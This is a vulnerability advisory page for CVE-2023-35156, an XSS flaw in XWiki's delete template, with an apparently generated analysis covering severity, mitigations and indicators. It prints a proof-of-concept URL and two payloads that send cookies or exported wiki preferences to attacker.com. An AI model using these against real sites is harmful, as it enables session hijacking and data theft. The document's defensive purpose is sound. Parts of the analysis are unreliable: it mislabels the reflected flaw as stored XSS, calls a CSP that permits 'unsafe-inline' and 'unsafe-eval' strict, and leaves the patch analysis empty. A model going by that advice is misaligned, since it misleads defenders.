CVE-2023-35156
CVE-2023-35156
Weakness (CWE)
CVSS Vector
v3.1- Attack Vector
- Network
- Attack Complexity
- Low
- Privileges Required
- None
- User Interaction
- Required
- Scope
- Changed
- Confidentiality
- High
- Integrity
- High
- Availability
- High
Description
XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the delete template to perform a XSS, e.g. by using URL such as: > xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=delete.vm&xredirect=javascript:alert(document.domain). This vulnerability exists since XWiki 6.0-rc-1. The vulnerability has been patched in XWiki 14.10.6 and 15.1. Note that a partial patch has been provided in 14.10.5 but wasn't enough to entirely fix the vulnerability.
Comprehensive Technical Analysis of CVE-2023-35156 (XWiki Platform Stored XSS Vulnerability)
1. Vulnerability Assessment and Severity Evaluation
CVE ID: CVE-2023-35156 CVSS Score: 9.6 (Critical) – CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H Vulnerability Type: Stored Cross-Site Scripting (XSS) via improper input validation in URL redirection parameters. Attack Complexity: Low (exploitable with minimal user interaction) Privileges Required: None (unauthenticated exploitation possible) User Interaction: Required (victim must click a malicious link) Scope: Changed (impacts other components beyond the vulnerable one) Impact: High (arbitrary JavaScript execution, session hijacking, defacement, or further exploitation)
Severity Justification
- High Impact (C:H/I:H/A:H): Successful exploitation allows arbitrary JavaScript execution in the context of a victim’s session, leading to:
- Confidentiality Impact (C:H): Theft of session cookies, sensitive data exfiltration.
- Integrity Impact (I:H): Defacement, unauthorized modifications to wiki content.
- Availability Impact (A:H): Potential denial-of-service (DoS) via infinite loops or resource exhaustion.
- Network Attack Vector (AV:N): Exploitable remotely without authentication.
- Low Attack Complexity (AC:L): Requires only a crafted URL, no advanced techniques.
- Changed Scope (S:C): Affects not just the vulnerable component but potentially other parts of the application due to stored XSS persistence.
2. Potential Attack Vectors and Exploitation Methods
Exploitation Mechanism
The vulnerability arises from improper sanitization of the xredirect parameter in the delete.vm template of XWiki’s FlamingoThemes module. An attacker can inject malicious JavaScript via a specially crafted URL, which is then stored and executed when a victim accesses the affected page.
Proof-of-Concept (PoC) Exploit
https://[XWIKI_INSTANCE]/xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=delete.vm&xredirect=javascript:alert(document.domain)
xpage=xpart: Renders a partial page.vm=delete.vm: Loads the vulnerable delete template.xredirect=javascript:alert(document.domain): Injects arbitrary JavaScript.
Attack Scenarios
-
Stored XSS via Malicious Link
- An attacker sends a crafted link (e.g., via phishing) to a victim.
- When clicked, the JavaScript executes in the victim’s browser with their privileges.
- Persistence: If the payload is stored (e.g., in a wiki page or theme), it affects all users who access the page.
-
Session Hijacking
- Attacker injects:
fetch('/xwiki/bin/get/XWiki/XWikiPreferences?xpage=export&format=xml').then(r=>r.text()).then(d=>fetch('https://attacker.com/steal?data='+btoa(d))) - Steals session cookies or sensitive data.
- Attacker injects:
-
Privilege Escalation
- If an admin visits the malicious page, the attacker can:
- Create a new admin account.
- Modify wiki content.
- Execute server-side code (if combined with other vulnerabilities).
- If an admin visits the malicious page, the attacker can:
-
Defacement & Malware Distribution
- Injects persistent malicious scripts to:
- Redirect users to phishing sites.
- Serve malware via drive-by downloads.
- Modify wiki content for misinformation.
- Injects persistent malicious scripts to:
3. Affected Systems and Software Versions
| Affected Versions | Patched Versions | Partial Fix |
|---|---|---|
| XWiki 6.0-rc-1 to 14.10.4 | XWiki 14.10.6, 15.1 | 14.10.5 (incomplete) |
Vulnerable Components
- FlamingoThemes Module (
delete.vmtemplate) - XWiki Platform Core (due to improper input validation in URL redirection)
Detection Methods
- Manual Check:
- Attempt to inject JavaScript via
xredirectparameter (e.g.,javascript:alert(1)). - If the script executes, the system is vulnerable.
- Attempt to inject JavaScript via
- Automated Scanning:
- Use OWASP ZAP or Burp Suite to test for XSS in URL parameters.
- Nuclei Template: XWiki XSS Detection (if available).
4. Recommended Mitigation Strategies
Immediate Actions
-
Apply Patches Immediately
- Upgrade to XWiki 14.10.6 or 15.1 (or later).
- If unable to patch, apply workarounds (see below).
-
Workarounds (if patching is delayed)
- Input Validation & Output Encoding:
- Modify
delete.vmto sanitize thexredirectparameter (e.g., using OWASP ESAPI or XWiki’s built-in sanitizers). - Example fix:
#set ($sanitizedRedirect = $util.encodeURI($xredirect)) #if (!$sanitizedRedirect.startsWith("http") && !$sanitizedRedirect.startsWith("/")) #set ($sanitizedRedirect = "/") #end
- Modify
- Content Security Policy (CSP):
- Deploy a strict CSP header to mitigate XSS impact:
Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; object-src 'none'; base-uri 'self'
- Deploy a strict CSP header to mitigate XSS impact:
- Web Application Firewall (WAF) Rules:
- Configure ModSecurity or Cloudflare WAF to block requests containing
javascript:in URL parameters.
- Configure ModSecurity or Cloudflare WAF to block requests containing
- Input Validation & Output Encoding:
-
Monitor for Exploitation Attempts
- Log Analysis: Monitor web server logs for suspicious
xredirectparameters. - SIEM Alerts: Set up alerts for XSS payloads in HTTP requests.
- Log Analysis: Monitor web server logs for suspicious
Long-Term Recommendations
- Security Hardening:
- Disable unnecessary Velocity macros that allow dynamic code execution.
- Enforce least privilege for wiki users.
- Regular Security Audits:
- Conduct penetration testing and code reviews for XSS vulnerabilities.
- Use static analysis tools (e.g., SonarQube, Checkmarx) to detect injection flaws.
- User Awareness Training:
- Educate users on phishing risks and suspicious links.
5. Impact on the Cybersecurity Landscape
Broader Implications
-
Enterprise Risk
- XWiki is widely used in corporate intranets, documentation systems, and knowledge bases.
- Exploitation could lead to data breaches, insider threats, or lateral movement in internal networks.
-
Supply Chain Attacks
- If XWiki is integrated with other enterprise applications (e.g., Jira, Confluence), an XSS could serve as an initial access vector for further attacks.
-
Compliance Violations
- GDPR, HIPAA, PCI DSS: Unauthorized data access via XSS may result in regulatory fines.
- ISO 27001: Failure to patch critical vulnerabilities may lead to compliance failures.
-
Exploitability in the Wild
- Low Barrier to Exploitation: No authentication required, easy to weaponize.
- Public Exploits: Proof-of-concept code is likely to emerge, increasing attack surface.
- Botnet & Malware Campaigns: Could be used in automated attacks (e.g., Magecart-style skimming).
6. Technical Details for Security Professionals
Root Cause Analysis
-
Vulnerable Code Path:
- The
delete.vmtemplate in XWiki’s FlamingoThemes module trusts user-controlledxredirectinput without proper sanitization. - When a user accesses the crafted URL, the
xredirectparameter is rendered as-is in the HTML response, allowing JavaScript execution.
- The
-
Patch Analysis:
Exploitation Flow
- Attacker crafts malicious URL:
https://victim-xwiki.com/xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=delete.vm&xredirect=javascript:fetch('https://attacker.com/steal?cookie='+document.cookie) - Victim clicks the link (e.g., via phishing email).
- XWiki processes the request, rendering the
xredirectparameter in the response. - Browser executes the injected JavaScript, sending the victim’s session cookie to the attacker.
- Attacker hijacks the session, gaining unauthorized access.
Advanced Exploitation Techniques
- Bypassing CSP:
- If CSP is enabled, attackers may use data URIs or JSONP endpoints to exfiltrate data.
- Chaining with Other Vulnerabilities:
- CSRF + XSS: Force a victim to perform actions (e.g., create an admin account).
- Server-Side Request Forgery (SSRF): If XWiki interacts with internal services, XSS could be used to pivot further.
Forensic Indicators of Compromise (IOCs)
| Indicator | Description |
|---|---|
| URL Patterns | xredirect=javascript:, xredirect=data:, xredirect=alert( |
| HTTP Headers | Unusual Referer or User-Agent in requests to attacker-controlled domains. |
| Log Entries | GET /xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=delete.vm&xredirect=javascript: |
| Network Traffic | Outbound connections to attacker domains (e.g., attacker.com/steal?cookie=...). |
Conclusion
CVE-2023-35156 is a critical stored XSS vulnerability in XWiki Platform that allows unauthenticated remote attackers to execute arbitrary JavaScript in the context of a victim’s session. Given its high CVSS score (9.6), low attack complexity, and potential for severe impact, organizations using XWiki must patch immediately or implement workarounds to mitigate risk.
Security teams should: ✅ Apply patches (XWiki 14.10.6 / 15.1). ✅ Deploy CSP and WAF rules as compensating controls. ✅ Monitor for exploitation attempts via logs and SIEM. ✅ Conduct security awareness training to prevent phishing-based attacks.
Failure to address this vulnerability could lead to data breaches, privilege escalation, and further compromise of enterprise systems.